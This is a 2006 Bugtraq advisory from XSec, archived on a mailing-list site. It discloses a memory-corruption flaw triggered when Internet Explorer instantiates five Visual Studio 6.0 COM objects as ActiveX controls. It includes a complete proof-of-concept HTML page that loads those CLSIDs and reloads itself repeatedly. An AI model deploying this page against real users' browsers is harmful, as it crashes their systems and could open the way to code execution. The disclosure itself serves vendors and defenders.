lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <44E4AF45.9060905@xsec.org>
Date: Fri, 18 Aug 2006 02:02:45 +0800
From: nop <nop@...c.org>
To: bugtraq@...urityfocus.com
Subject: [XSec-06-07]: Visual Studio 6.0 Multiple COM Object Instantiation
 Vulnerability

Advisory ID:
XSec-06-07

Advisory Name:
Visual Studio 6.0 Multiple COM Object Instantiation Vulnerability

Release Date:
08/18/2006

Tested on:
Visual Studio 6.0/Internet Explorer 6.0 SP1

Affected version:
Visual Studio 6.0

Author:
nop <nop#xsec.org>
http://www.xsec.org

Overview:
Multiple vulnerability has been found in Visual Studio 6.0 \
When Internet Explorer tries to instantiate the TCPROPS.DLL, \
FP30WEC.DLL,mdt2db.dll,mdt2qd.dll,VI30AUT.DLL (Visual Stuido \
6.0) COM object as an ActiveX control, it may corrupt system \
memory in such a way that an attacker may DoS and possibly \
could execute arbitrary code.

Exploit:
=============== vs6.htm start ================

<!--
// Visual Studio 6.0 Multiple COM Object Instantiation Vulnerability
// tested on Windows 2000/2003

// http://www.xsec.org
// nop (nop#xsec.org)

// CLSID: {9AF971C5-8E7A-11D0-A2BB-00C04FC33E92}
// Info: FpFile Class// ProgID: WECAPI.FpFile.1
// InprocServer32: C:\WINDOWS\System\FP30WEC.DLL

// CLSID: {AB39F080-0F5D-11D1-8E2F-00C04FB68D60}
// Info: TCExtPage Class
// InprocServer32: C:\PROGRA~1\MICROS~1\Common\Tools\TCPROPS.DLL

// CLSID: {CCDBBDA1-FA19-11D0-9B51-00A0C91E29D8}
// Info: FpaFile Class// ProgID: FpaFile.FpaFile.1
// InprocServer32: C:\WINDOWS\system\VI30AUT.DLL

// CLSID: {E9B0E6CB-811C-11D0-AD51-00A0C90F5739}
// Info: Microsoft Data Tools Query Designer// ProgID: MSDTQueryDesigner2
// InprocServer32: C:\Program Files\Common Files\Microsoft
Shared\MSDesigners98\mdt2qd.dll

// CLSID: {E9B0E6D4-811C-11D0-AD51-00A0C90F5739}
// Info: Microsoft Data Tools Database Designer// ProgID:
MSDTDatabaseDesigner2
// InprocServer32: C:\Program Files\Common Files\Microsoft
Shared\MSDesigners98\mdt2db.dll
--!>

<html><body>
<object classid="CLSID:{9AF971C5-8E7A-11D0-A2BB-00C04FC33E92}"> </object>
<object classid="CLSID:{AB39F080-0F5D-11D1-8E2F-00C04FB68D60}"> </object>
<object classid="CLSID:{CCDBBDA1-FA19-11D0-9B51-00A0C91E29D8}"> </object>
<object classid="CLSID:{E9B0E6CB-811C-11D0-AD51-00A0C90F5739}"> </object>
<object classid="CLSID:{E9B0E6D4-811C-11D0-AD51-00A0C90F5739}"> </object>
<!--
</body>
<script>location.reload();</script>
</html>

=============== vs6.htm end ==================

Link:
http://www.xsec.org/index.php?module=releases&act=view&type=1&id=15

About XSec:
We are redhat.


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ